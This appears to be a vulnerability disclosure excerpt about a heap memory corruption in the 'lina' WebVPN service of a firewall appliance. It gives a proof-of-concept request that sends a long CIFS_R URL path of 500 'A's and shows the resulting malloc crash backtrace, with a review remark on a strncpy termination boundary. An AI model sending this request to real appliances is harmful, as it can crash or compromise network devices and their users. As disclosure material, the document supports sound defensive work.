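The boundary worth noting in review: a name of exactly 336 bytes plus '|' does not overrun the chunk in the original code, but strncpy then leaves no terminating NUL, which the hardened version also rejects because it reserves one byte for it.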
Repro:
Login to WebVPN portal, navigate to:
https://portal/+webvpn+/CIFS_R/server/name/ followed by 500 'A's.
("server" and "name" may be passed verbatim)
*** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 ***
======= Backtrace: =========
/lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f]
/lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee]
/lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99]
/lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0]
lina(+0x321976a)[0x7fa41a2b276a]
lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83]
lina(resMgrCalloc+0x100)[0x7fa419659410]
lina(calloc+0x94)[0x7fa419589a34]
lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608]
lina(ewsServeFindDocument+0x142)[0x7fa418278192]
lina(ewsServeStart+0x114)[0x7fa4182784a4]
lina(ewsParse+0x19a0)[0x7fa418272cc0]
lina(ewsRun+0x9c)[0x7fa41826955c]
lina(emweb_th+0x6ab)[0x7fa418286aeb]
lina(+0xde58ab)[0x7fa417e7e8ab]
This was tested on 9.6(2)